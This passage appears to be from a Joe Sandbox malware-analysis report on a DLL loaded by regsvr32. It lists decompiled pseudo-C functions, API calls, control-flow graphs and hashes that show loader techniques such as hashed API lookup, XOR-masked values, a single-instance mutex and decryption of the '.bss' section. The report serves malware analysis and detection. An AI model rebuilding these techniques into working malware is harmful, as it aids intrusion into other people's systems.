                  				if (E00000001180008708(_t156, _t191) != r12d) goto 0x80005302;
                  				goto 0x8000540f;
                  				_t213 = _t228 + 0x18000f000;
                  				r9d = _t213[1] & 0x0000ffff;
                  				r11d =  *_t213 & 0x0000ffff;
                  				_t217 = __r9 + 8;
                  				if (_t218 - _t217 <= 0) goto 0x80005339;
                  				if ((r14d ^ 0xe49a1e6d) == r12d) goto 0x8000533c;
                  				E00000001180004ED8(__r9 +  &(_t213[4]), _t28);
                  				goto 0x8000533c;
                  				if (_t219 != _t219) goto 0x8000534b;
                  				goto 0x8000540f;
                  				r14d = r14d ^ 0xecb028fc;
                  				if (_t218 - _t217 <= 0) goto 0x8000536e;
                  				if (r14d == r12d) goto 0x80005371;
                  				E00000001180004ED8(__r9 +  &(_t213[4]), _t28);
                  				goto 0x80005371;
                  				_t155 = _t219;
                  				if (_t155 == _t219) goto 0x80005341;
                  				 *(_t191 + 0x40) = _t213;
                  				 *0x8000d488 = _t191;
                  				_t70 = GetModuleHandleA(??);
                  				if (_t155 ==  *((intOrPtr*)(_t204 + 0x270))) goto 0x800053fb;
                  				E0000000118000459C(_t70, 0xaade337c,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				if (_t155 == _t219) goto 0x800053be;
                  				r8d = GetCurrentThreadId();
                  				_t73 =  *_t155();
                  				goto 0x800053c1;
                  				if (_t219 == _t219) goto 0x80005150;
                  				E0000000118000459C(_t73, 0x1c8cff93,  *((intOrPtr*)(_t201 + 0x18)));
                  				if (_t155 == _t219) goto 0x800053ee;
                  				 *_t155();
                  				goto 0x800053f1;
                  				if (r12d != r12d) goto 0x8000541e;
                  				goto 0x80005150;
                  				asm("lock add dword [ebp+0x38], 0x1");
                  				if (E00000001180002B60(2, __edi, __esi, __ebp, _t191, __r9, _t217, _t218) == r12d) goto 0x8000541e;
                  				E00000001180005578(_t156, _t191, _t219);
                  				goto 0x8000541e;
                  				return 8;
                  			}































                  0x18000508c
                  0x18000508c
                  0x18000508c
                  0x180005091
                  0x1800050a1
                  0x1800050a8
                  0x1800050af
                  0x1800050b6
                  0x1800050cb
                  0x1800050d1
                  0x1800050d4
                  0x1800050da
                  0x1800050e8
                  0x1800050f1
                  0x1800050f7
                  0x1800050f7
                  0x1800050fe
                  0x180005101
                  0x180005112
                  0x180005129
                  0x180005131
                  0x180005138
                  0x18000513b
                  0x180005140
                  0x180005142
                  0x180005144
                  0x180005147
                  0x18000514e
                  0x180005150
                  0x180005156
                  0x180005164
                  0x180005171
                  0x180005177
                  0x180005184
                  0x1800051a1
                  0x1800051a5
                  0x1800051b0
                  0x1800051b4
                  0x1800051be
                  0x1800051ca
                  0x1800051dc
                  0x1800051e2
                  0x1800051ec
                  0x1800051ee
                  0x1800051f7
                  0x1800051f9
                  0x18000520b
                  0x180005214
                  0x18000521e
                  0x180005224
                  0x18000522e
                  0x180005234
                  0x180005248
                  0x18000524e
                  0x18000526d
                  0x180005280
                  0x18000529f
                  0x1800052a5
                  0x1800052b6
                  0x1800052c0
                  0x1800052c5
                  0x1800052cc
                  0x1800052ce
                  0x1800052d2
                  0x1800052da
                  0x1800052de
                  0x1800052e2
                  0x1800052e5
                  0x1800052f6
                  0x1800052fd
                  0x180005302
                  0x18000530d
                  0x180005312
                  0x18000531c
                  0x180005323
                  0x18000532d
                  0x180005332
                  0x180005337
                  0x18000533f
                  0x180005346
                  0x18000534b
                  0x180005355
                  0x18000535f
                  0x180005367
                  0x18000536c
                  0x18000536e
                  0x180005374
                  0x180005378
                  0x18000537c
                  0x180005383
                  0x180005391
                  0x18000539c
                  0x1800053a7
                  0x1800053b4
                  0x1800053b7
                  0x1800053bc
                  0x1800053c4
                  0x1800053d3
                  0x1800053db
                  0x1800053ea
                  0x1800053ec
                  0x1800053f4
                  0x1800053f6
                  0x1800053fb
                  0x18000540d
                  0x180005412
                  0x180005417
                  0x18000543a

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: HandleModule$Heap$AllocErrorLast$CloseCriticalCurrentEnumFreeInitializeOpenSectionThreadmemcpymemset
                  • String ID:
                  • API String ID: 2014251338-0
                  • Opcode ID: 23df82f8670f2ca5d57fcd725f6ce51a55fb78b39f2e81572481ed79961b9dbc
                  • Instruction ID: 9261d350846713a6d61e62943f4705d1cd3b2ba236d4958cf944a875f2eb3085
                  • Opcode Fuzzy Hash: 23df82f8670f2ca5d57fcd725f6ce51a55fb78b39f2e81572481ed79961b9dbc
                  • Instruction Fuzzy Hash: 1AA15C32204B4D92EAE6DB22E4953EE7391B78C7C5F50C421EA8A47795DE78CB9DC301
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: ErrorFileLast$CloseCreateDirectoryHandleInitQueryStringUnicode
                  • String ID:
                  • API String ID: 2375947951-0
                  • Opcode ID: 6a213b4158cada7e0fc9009fce08ec59d8022234906b0ab491453136b5d08942
                  • Instruction ID: 86e8c0801eecd6214d3de86c7c9a3f36e2355b629a028b10123d7888b335a31b
                  • Opcode Fuzzy Hash: 6a213b4158cada7e0fc9009fce08ec59d8022234906b0ab491453136b5d08942
                  • Instruction Fuzzy Hash: A5319E72214B8486D7A1CF15E45439E77A1F78CBD4F588626EAAD43B88DF38CA48CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 49%
                  			E00000001180004F1C(void* __eax, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r11) {
                  				intOrPtr _t23;
                  				intOrPtr _t24;
                  				int _t30;
                  				void* _t47;
                  				void* _t48;
                  				long long _t58;
                  				void* _t74;
                  				intOrPtr* _t77;
                  				intOrPtr* _t78;
                  				long long _t82;
                  				long long _t84;
                  				void* _t85;
                  				long long _t87;
                  				void* _t93;
                  				void* _t94;
                  				long _t95;
                  				long _t97;
                  				long _t99;
                  
                  				_t94 = __r11;
                  				_t58 = _t87;
                  				 *((long long*)(_t58 + 8)) = __rbx;
                  				 *((long long*)(_t58 + 0x10)) = _t84;
                  				 *((long long*)(_t58 + 0x18)) = __rsi;
                  				 *((long long*)(_t58 + 0x20)) = __rdi;
                  				_t85 = __rcx;
                  				r8d = 0;
                  				HeapCreate(_t99, _t97, _t95); // executed
                  				_t82 = _t58;
                  				if (_t58 == 0) goto 0x8000506b;
                  				_t74 =  *((intOrPtr*)(__rcx + 0x3c)) + __rcx;
                  				_t77 = _t58 + _t74 + 0x68;
                  				_t23 =  *_t77;
                  				if (_t23 == 0) goto 0x80004ffc;
                  				if (_t23 == 0x7373622e) goto 0x80004f8a;
                  				_t78 = _t77 + 0x28;
                  				_t24 =  *_t78;
                  				if (_t24 != 0) goto 0x80004f79;
                  				if (_t24 == 0) goto 0x80004ffc;
                  				r13d =  *(_t78 + 0x10);
                  				r12d =  *(_t78 + 0x14);
                  				r12d = r12d ^  *(_t74 + 8);
                  				r12d = r12d ^ r13d;
                  				HeapAlloc(??, ??, ??);
                  				if (_t58 == 0) goto 0x80004ff5;
                  				r9d = r12d;
                  				r8d = r13d;
                  				E00000001180002524(0,  *((intOrPtr*)(_t78 + 0xc)), _t58, __rbx, _t58, _t74 + __rcx, _t82);
                  				r11d =  *((intOrPtr*)(_t78 + 0xc));
                  				 *0x8000d490 = _t58 - _t94 - _t85;
                  				 *0x8000d498 = E00000001180001B48(0, 0x2a, _t58, 0x80011040, _t58 - _t94 - _t85 + 0x80011040);
                  				goto 0x80005001;
                  				goto 0x80005001;
                  				if (2 == 0) goto 0x80005010;
                  				HeapDestroy(??);
                  				goto 0x8000506b;
                  				HeapAlloc(??, ??, ??);
                  				if (0x80011040 != 0) goto 0x80005049;
                  				_t30 = HeapDestroy(??);
                  				goto 0x8000506b;
                  				0x8000236a();
                  				 *0x180011048 = _t82;
                  				 *0x8000d4a0 = 0x80011040;
                  				return E0000000118000508C(_t30, 0,  *0x8000d498, _t47, _t48, 0x80011040, 0x80011040, _t85, _t93);
                  			}





















                  0x180004f1c
                  0x180004f1c
                  0x180004f1f
                  0x180004f23
                  0x180004f27
                  0x180004f2b
                  0x180004f39
                  0x180004f3c
                  0x180004f4b
                  0x180004f51
                  0x180004f57
                  0x180004f63
                  0x180004f6a
                  0x180004f6f
                  0x180004f73
                  0x180004f7e
                  0x180004f80
                  0x180004f84
                  0x180004f88
                  0x180004f8c
                  0x180004f8e
                  0x180004f92
                  0x180004f99
                  0x180004fa2
                  0x180004fa5
                  0x180004fb1
                  0x180004fb6
                  0x180004fb9
                  0x180004fc2
                  0x180004fc7
                  0x180004fdd
                  0x180004fed
                  0x180004ff3
                  0x180004ffa
                  0x180005003
                  0x180005008
                  0x18000500e
                  0x18000502b
                  0x180005037
                  0x18000503c
                  0x180005047
                  0x180005051
                  0x180005059
                  0x18000505d
                  0x18000508b

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heap$AllocDestroy$Create
                  • String ID: .bss
                  • API String ID: 388876957-3890483948
                  • Opcode ID: 5b869ae12754507e5804a63dee81d5c07f3243b930885b44b1c254585407c773
                  • Instruction ID: 17f0f38e5d9243197e023c83d38f09e6848a0c07c4c3a118f17cd0d0cedb6ef9
                  • Opcode Fuzzy Hash: 5b869ae12754507e5804a63dee81d5c07f3243b930885b44b1c254585407c773
                  • Instruction Fuzzy Hash: 68418B72300B4986FB96CB56A8543AA73A0FB4CFD4F04C025EE494BB81DF38DA998710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 42%
                  			E00000001180008708(long long __rbx, intOrPtr* __rcx, void* _a8, char _a16, long long _a24) {
                  				void* _v72;
                  				long long _v88;
                  				void* __rsi;
                  				void* __rbp;
                  				void* _t22;
                  				void* _t24;
                  				void* _t44;
                  				long long _t45;
                  				long long _t46;
                  				struct _SECURITY_ATTRIBUTES* _t55;
                  				long long _t58;
                  				int _t60;
                  				WCHAR* _t64;
                  				void* _t67;
                  				void* _t74;
                  				void* _t77;
                  
                  				_t46 = __rbx;
                  				_t44 = _t67;
                  				 *((long long*)(_t44 + 8)) = __rbx;
                  				r9d = 0;
                  				 *((intOrPtr*)(_t44 - 0x48)) = 0x18;
                  				 *((intOrPtr*)(_t44 - 0x38)) = 0;
                  				0x800085dc(); // executed
                  				if (_t22 == 0) goto 0x800087f7;
                  				_a16 =  *__rcx;
                  				_t45 =  &_a24;
                  				r9d = 0;
                  				_v88 = _t45;
                  				_t24 = E000000011800030C8(__rbx,  &_a16,  *0x8000d490, __rcx,  *0x8000d490 + 0x180011188, _t77, _t74);
                  				if (_t45 == _t46) goto 0x800087f7;
                  				E0000000118000459C(_t24, 0x3ff22481,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				if (_t45 == _t46) goto 0x800087c0;
                  				CreateMutexW(_t55, _t60, _t64); // executed
                  				goto 0x800087c3;
                  				_t58 = _t46;
                  				if (_t58 == _t46) goto 0x800087e9;
                  				if (GetLastError() != 0xb7) goto 0x800087e0;
                  				FindCloseChangeNotification(??); // executed
                  				goto 0x800087e9;
                  				_a24 = _t58;
                  				HeapFree(??, ??, ??);
                  				return 1;
                  			}



















                  0x180008708
                  0x180008708
                  0x18000870b
                  0x180008747
                  0x18000874a
                  0x180008751
                  0x180008754
                  0x18000875b
                  0x18000876f
                  0x180008776
                  0x180008786
                  0x180008789
                  0x18000878e
                  0x180008799
                  0x1800087a4
                  0x1800087ac
                  0x1800087b9
                  0x1800087be
                  0x1800087c0
                  0x1800087c6
                  0x1800087d3
                  0x1800087d8
                  0x1800087de
                  0x1800087e0
                  0x1800087f1
                  0x18000880c

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: ErrorHeapLastmemcpy$AllocChangeCloseCreateFindFreeMutexNotificationlstrlen
                  • String ID:
                  • API String ID: 4170216436-0
                  • Opcode ID: 91fca6edbb480d4a463791ea284bd5c18021fdd31d2df17c4dd4c6e232cc3c69
                  • Instruction ID: 127f5c0fcc647b7374bd47b38eb5124d32550bc361860966e3f5016e667268f0
                  • Opcode Fuzzy Hash: 91fca6edbb480d4a463791ea284bd5c18021fdd31d2df17c4dd4c6e232cc3c69
                  • Instruction Fuzzy Hash: B621593220468996EBA1CF52E8407D977A1FB8CBC8F588426EF4D47B49DE34D64EC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 149 180007b94-180007be5 150 180007da3 149->150 151 180007beb-180007bf3 149->151 153 180007da8-180007db8 150->153 151->150 152 180007bf9-180007c24 RtlAllocateHeap 151->152 154 180007c2a-180007c63 memset 152->154 155 180007d9c-180007da1 152->155 156 180007c69-180007c93 154->156 157 180007d6d-180007d85 154->157 155->153 159 180007c98-180007c9b 156->159 160 180007d87-180007d8a 157->160 161 180007d8c-180007d9a HeapFree 157->161 159->157 162 180007ca1-180007caa 159->162 160->153 161->153 163 180007cd6-180007ce7 162->163 164 180007cac-180007cd1 call 180008c48 162->164 166 180007ce9-180007ced 163->166 167 180007d1d-180007d68 163->167 164->163 169 180007cfa-180007d02 166->169 170 180007cef-180007cf8 166->170 167->159 171 180007d07-180007d0e 169->171 170->171 171->166 172 180007d10-180007d18 171->172 172->167
                  APIs
                  • RtlAllocateHeap.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C13
                  • memset.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C35
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: AllocateHeapmemset
                  • String ID:
                  • API String ID: 669713250-0
                  • Opcode ID: 231eb40ae42393b3803f541fbe69a0b1f40d2ddbec7427b92020bbe0007c72ff
                  • Instruction ID: b8eae849a3001c6edc556b20ee36b044cea257758f74ce9d79c82757b9587b00
                  • Opcode Fuzzy Hash: 231eb40ae42393b3803f541fbe69a0b1f40d2ddbec7427b92020bbe0007c72ff
                  • Instruction Fuzzy Hash: 7F518C72B04B8486E7A6CB05E444B9AB7B1FB98BD4F508116EE8D43B54DF38C9A5CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 173 180002464-180002482 LoadLibraryA 174 180002484-180002495 call 180007b94 173->174 175 1800024af-1800024b5 GetLastError 173->175 179 1800024a4-1800024ad FreeLibrary 174->179 180 180002497-1800024a2 174->180 176 1800024b7-1800024c8 175->176 179->176 180->176
                  C-Code - Quality: 46%
                  			E00000001180002464(void* __rax, long long __rbx, long long* __rdx, long long __rsi, long long _a8, long long _a16, void* _a24) {
                  				void* _t14;
                  				long long _t21;
                  				void* _t25;
                  				long long* _t27;
                  				void* _t32;
                  				void* _t33;
                  				void* _t34;
                  				void* _t35;
                  
                  				_a8 = __rbx;
                  				_a16 = __rsi;
                  				_t27 = __rdx; // executed
                  				LoadLibraryA(??); // executed
                  				_t25 = __rax;
                  				if (__rax == 0) goto 0x800024af;
                  				if (E00000001180007B94(_t14, __rbx, __rax,  &_a24, _t32, _t33, _t34, _t35) != 0) goto 0x800024a4;
                  				_t21 = _a24;
                  				 *_t21 = _t25;
                  				 *_t27 = _t21;
                  				goto 0x800024b7;
                  				FreeLibrary(??);
                  				goto 0x800024b7;
                  				return GetLastError();
                  			}











                  0x180002464
                  0x180002469
                  0x180002473
                  0x180002476
                  0x18000247c
                  0x180002482
                  0x180002495
                  0x180002497
                  0x18000249c
                  0x18000249f
                  0x1800024a2
                  0x1800024a7
                  0x1800024ad
                  0x1800024c8

                  APIs
                  • LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476
                  • GetLastError.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024AF
                    • Part of subcall function 0000000180007B94: RtlAllocateHeap.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C13
                    • Part of subcall function 0000000180007B94: memset.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C35
                  • FreeLibrary.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024A7
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Library$AllocateErrorFreeHeapLastLoadmemset
                  • String ID:
                  • API String ID: 105124555-0
                  • Opcode ID: 87bd12416fb62ea3d1556e717187c020765267e15b714ec180dccf21d281dbfb
                  • Instruction ID: 15b41fa467f29f274ac49399cf4168cd092f7d47ffdb68e5546afb005077a2c4
                  • Opcode Fuzzy Hash: 87bd12416fb62ea3d1556e717187c020765267e15b714ec180dccf21d281dbfb
                  • Instruction Fuzzy Hash: 6EF01231705B8982EB96CB55B5543A973A4BB9CBD0F54C020FB5943B49EF38C559C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 181 180006dcc-180006e1f call 1800089e4 184 180006e21-180006e36 lstrlenW 181->184 185 180006e8a 181->185 186 180006e38-180006e4d lstrcmpiW 184->186 187 180006e4f-180006e77 call 180002594 184->187 188 180006e8f-180006eaf 185->188 186->187 189 180006e7a-180006e88 HeapFree 186->189 187->189 189->188
                  C-Code - Quality: 68%
                  			E00000001180006DCC(void* __edx, long long __rbx, intOrPtr* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi) {
                  				int _t27;
                  				void* _t47;
                  				long long _t49;
                  				intOrPtr* _t64;
                  				long long _t66;
                  				intOrPtr* _t67;
                  				void* _t69;
                  				void* _t70;
                  				void* _t72;
                  				void* _t75;
                  				WCHAR* _t78;
                  				WCHAR* _t81;
                  
                  				_t49 = __rbx;
                  				_t47 = _t69;
                  				 *((long long*)(_t47 + 8)) = __rbx;
                  				 *((long long*)(_t47 + 0x10)) = _t66;
                  				 *((long long*)(_t47 + 0x18)) = __rsi;
                  				 *((long long*)(_t47 + 0x20)) = __rdi;
                  				_t70 = _t69 - 0x30;
                  				_t64 = __rcx;
                  				_t67 = __rdx;
                  				E000000011800089E4(__rbx,  *0x8000d490 + 0x180011220, __rdx, __rdi, __rcx, _t72);
                  				if ( *0x8000d4a0 == _t49) goto 0x80006e8a;
                  				 *_t67 =  *_t64;
                  				if (lstrlenW(_t81) - 0xe <= 0) goto 0x80006e4f;
                  				_t27 = lstrcmpiW(_t78); // executed
                  				if (_t27 == 0) goto 0x80006e7a;
                  				E00000001180002594(0, _t49,  *0x8000d4a0,  *0x8000d490 + 0x180011240, _t64, _t70 + 0x20, _t75);
                  				r11d =  *((intOrPtr*)(_t70 + 0x20));
                  				 *_t67 =  *_t67 +  *((intOrPtr*)(_t70 + 0x24)) + r11d;
                  				 *((intOrPtr*)(_t67 + 4)) =  *((intOrPtr*)(_t67 + 4)) +  *((intOrPtr*)(_t70 + 0x28)) +  *((intOrPtr*)(_t70 + 0x2c));
                  				HeapFree(??, ??, ??);
                  				goto 0x80006e8f;
                  				return 8;
                  			}















                  0x180006dcc
                  0x180006dcc
                  0x180006dcf
                  0x180006dd3
                  0x180006dd7
                  0x180006ddb
                  0x180006de5
                  0x180006df7
                  0x180006dfe
                  0x180006e12
                  0x180006e1f
                  0x180006e24
                  0x180006e36
                  0x180006e45
                  0x180006e4d
                  0x180006e59
                  0x180006e5e
                  0x180006e6e
                  0x180006e77
                  0x180006e82
                  0x180006e88
                  0x180006eaf

                  APIs
                    • Part of subcall function 00000001800089E4: HeapAlloc.KERNEL32(?,?,?,0000000180006E17,?,?,?,?,00000000,00000001800052B1), ref: 0000000180008A5D
                  • lstrlenW.KERNEL32(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E2B
                  • lstrcmpiW.KERNELBASE(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E45
                  • HeapFree.KERNEL32(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E82
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heap$AllocFreelstrcmpilstrlen
                  • String ID:
                  • API String ID: 727816722-0
                  • Opcode ID: a22ed0a1ed0f0616c918df9911004096ede51290a7a9af073c19c02c22aa0494
                  • Instruction ID: d0415e672ad6f4a9c89e0efb1880c6926a1671767ff9eca089c1e6ebc0bc87c8
                  • Opcode Fuzzy Hash: a22ed0a1ed0f0616c918df9911004096ede51290a7a9af073c19c02c22aa0494
                  • Instruction Fuzzy Hash: 7B216D36600B8896D751DB16E84039AB3A1F78CBD8F48C122FE4D83758DF38CA4ACB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 192 1333edc-133405d 194 133402a-13340ae 192->194 195 133405f-1334069 192->195 198 13340a0-13340a8 194->198 199 13340b0-13340b8 194->199 197 1334004-133400f 195->197 200 1333f96-1333fae call 1334d69 197->200 208 1334045-1334253 198->208 201 1334020-133409b call 1334faa 199->201 210 1333f27-1333f29 200->210 214 1334240-133424b 208->214 215 1334255-1334257 208->215 212 1333f2b-1333f31 210->212 213 1333f1a-1333f22 210->213 212->213 217 1333f33 212->217 213->210 216 1333fce-1333fdb 213->216 218 133423b-133423f 215->218 219 1333f87-1333f94 216->219 220 1333fdd-1333fea 216->220 221 1333f7a-1333f85 217->221 219->200 224 1333f5d-1333f69 call 1334929 219->224 222 1333fc0-1333fc9 220->222 223 1333fec-1334002 220->223 221->219 221->220 222->213 223->197 223->208 228 1333fb3-1333fbe 224->228 229 1333f6b-1333f75 call 1334929 224->229 228->229 229->221 232 1334114-1334121 229->232 233 13340f3-1334100 call 1335141 232->233 234 1334123-133412f 232->234 233->234 240 1334102-133410f call 1334e98 233->240 236 1334131-1334139 234->236 237 13340e6-13340f1 234->237 236->240 241 133413b-1334146 236->241 237->233 238 13340db-13340e4 237->238 238->237 242 13340bd-13340cc RtlAllocateHeap 238->242 240->232 244 1334164-1334175 241->244 242->241 245 13340ce-13340d6 242->245 244->218 245->244 248 13341d8-13341df 245->248 250 13341e1-13341ea 248->250 251 13341ec-13341f8 248->251 250->251 252 1334204-1334213 call 1334e98 250->252 253 1334215-1334220 251->253 254 13341fa-1334202 251->254 252->253 255 1334222-133422b call 1335141 252->255 253->254 253->255 254->252 256 13341cb-13341cf 254->256 255->218 261 13341be-13341c9 255->261 256->248 261->244
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.246392867.0000000001330000.00000040.00001000.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_1330000_regsvr32.jbxd
                  Similarity
                  • API ID:
                  • String ID: R
                  • API String ID: 0-1466425173
                  • Opcode ID: f6db66518de9870f800278d0e751a791126f3dfc3022282491ac7af2e4f2bea1
                  • Instruction ID: c2e1959adb1794658ea3beb8051a09547a3a9f913a7a858babd717707100de46
                  • Opcode Fuzzy Hash: f6db66518de9870f800278d0e751a791126f3dfc3022282491ac7af2e4f2bea1
                  • Instruction Fuzzy Hash: AD617631718A8D8FD7A4DB2CC454766FBE1FBD8248FC48559E1CEC3651D625C889C70A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 262 1800025ec-180002607 SleepEx 263 180002609-180002610 262->263 264 18000261b-18000261f 262->264 263->264 265 180002612-180002615 WaitForSingleObject 263->265 265->264
                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: ObjectSingleSleepWait
                  • String ID:
                  • API String ID: 309074506-0
                  • Opcode ID: 76b9bff6f2f2c4897aeed711b389028ad91ff366cb314fc98fdffdba1b370fa5
                  • Instruction ID: 868bbf46d8f10ff22f1b5017158e4687c10dd0102503e43f41494b1e161a0d2d
                  • Opcode Fuzzy Hash: 76b9bff6f2f2c4897aeed711b389028ad91ff366cb314fc98fdffdba1b370fa5
                  • Instruction Fuzzy Hash: 6BD05B3470360442FD9ED711985036532205F8CBD9F54C614A52B472D0CE29969E4700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 266 1333880 267 1333897-13338a3 266->267 268 13338a5-13338b1 call 1334929 267->268 269 1333908-1333917 267->269 270 1333919-1333928 268->270 279 13338b3-1333a16 268->279 269->270 271 13338f8-1333906 269->271 274 1333882-1333895 270->274 275 133392e-1333ae1 270->275 271->269 273 13338c9-13338d5 call 1334929 271->273 278 13338d7-13338e7 273->278 284 13338e9-13338f6 273->284 274->267 274->278 278->279 286 1333a32-1333a41 call 1335141 279->286 287 1333a18-1333a23 279->287 284->268 284->271 293 1333a43-1333a4e 286->293 295 13339df-13339ed 286->295 288 1333a25-1333a30 287->288 289 13339ef-13339f9 287->289 288->286 288->293 291 13339fb-1333a05 289->291 292 1333a5f-1333a68 RtlAllocateHeap 289->292 296 1333a50-1333a5a 291->296 297 1333c82-1333c88 292->297 293->291 293->296 295->287 295->289 298 1333c6e-1333cf0 call 1334e98 296->298 299 1333c93-1333c9c 297->299 300 1333c8a 297->300 305 1333cd1 298->305 306 1333cac-1333cb1 298->306 300->299 307 1333cb3-1333cf8 306->307 308 1333cb5-1333cc2 306->308 310 1333cfa-1333cff call 1335141 307->310 311 1333d08-1333d0a 307->311
                  APIs
                  Memory Dump Source
